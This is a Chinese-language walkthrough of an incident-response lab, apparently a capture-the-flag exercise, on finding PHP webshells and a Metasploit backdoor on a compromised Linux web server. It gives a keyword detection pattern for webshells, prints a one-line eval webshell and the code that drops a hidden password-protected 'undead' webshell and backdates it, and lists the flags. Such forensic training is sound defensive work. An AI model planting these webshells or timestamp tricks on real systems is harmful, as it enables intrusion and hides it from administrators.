01 前置知识
在线沙箱:
vt https://www.virustotal.com
奇安信沙箱 https://sandbox.ti.qianxin.com/sandbox/page
微步云沙箱 https://s.threatbook.com/
安恒云沙箱 https://sandbox.ti.qianxin.com/sandbox/page
360沙箱云 https://ata.360.net/
手工查杀:
在根目录下查找所有后缀为php的文件,-iname意思是不区分大小写
查找其中的恶意关键词
find ./ -type f -iname "*.php" |xargs egrep 'assert|bash|system|phpspy|c99sh|milw0rm|eval|\(gunerpress|\(base64_decoolcode|spider_bc|shell_exec|passthru|\(\$\_\POST\[|eval\(|file_put_contents|base64_decode'
php不死马/内存马原理:
php不死马/内存马是将不死马启动后删除本身,在内存中执行死循环,使管理员无法删除木马文件
介绍文章:
PHP不死马介绍文章
02 题目
账号:root 密码:linuxruqin
ssh root@IP
1.web目录存在木马,请找到木马的密码提交
2.服务器疑似存在不死马,请找到不死马的密码提交
3.不死马是通过哪个文件生成的,请提交文件名
4.黑客留下了木马文件,请找出黑客的服务器ip提交
5.黑客留下了木马文件,请找出黑客服务器开启的监控端口提交
1.web目录存在木马,请找到木马的密码提交
cd /var/www/html
打包web目录到本地,使用d盾,河马在线,或手工查杀的方式锁定木马
下载过程中火绒报毒
使用D盾查杀:
经过查看可以确定,后门文件为 .shell.php 1.php index.php
1.php文件内容为:
<?php eval($_POST[1]);?>
flag{1}
2.服务器疑似存在不死马,请找到不死马的密码提交
根据题目可知存在不死马
如果不了解不死马的可以到前置知识中查看相关文章介绍
一般是由于一个php文件生成另外一个隐藏文件的形式,这里是通过index.php生成了.shell.php文件
index.php中的关键代码
$file = '/var/www/html/.shell.php';
$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';
file_put_contents($file, $code);
system('touch -m -d "2021-01-01 00:00:01" .shell.php');
usleep(3000);
定义了webshell的生成路径
$file = '/var/www/html/.shell.php';
定义了webshell
$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';
将webshell写入.shell.php文件
file_put_contents($file, $code);
暂停脚本3毫秒
usleep(3000);
当这个index.php文件被请求执行时,会生成.shell.php文件
分析完了不死马,接着提交flag,可以轻易得知不死马的密码是
5d41402abc4b2a76b9719d911017c592
flag{hello}
3.不死马是通过哪个文件生成的,请提交文件名
根据上述不死马的分析可知是由index.php文件生成的
flag{index.php}
4.黑客留下了木马文件,请找出黑客的服务器ip提交
可以在/var/www/html路径下找到一个可疑的elf文件,众所周知,linux中可执行文件后缀就是elf文件,将shell(1).elf文件拿下来,丢到沙箱中分析
微步云沙箱:
安恒云沙箱:可以看到是msf生成的后门,ip为10.11.55.21
flag{10.11.55.21}
5.黑客留下了木马文件,请找出黑客服务器开启的监控端口提交
由安恒沙箱中结果可知,黑客服务器的监控端口是3333
flag{3333}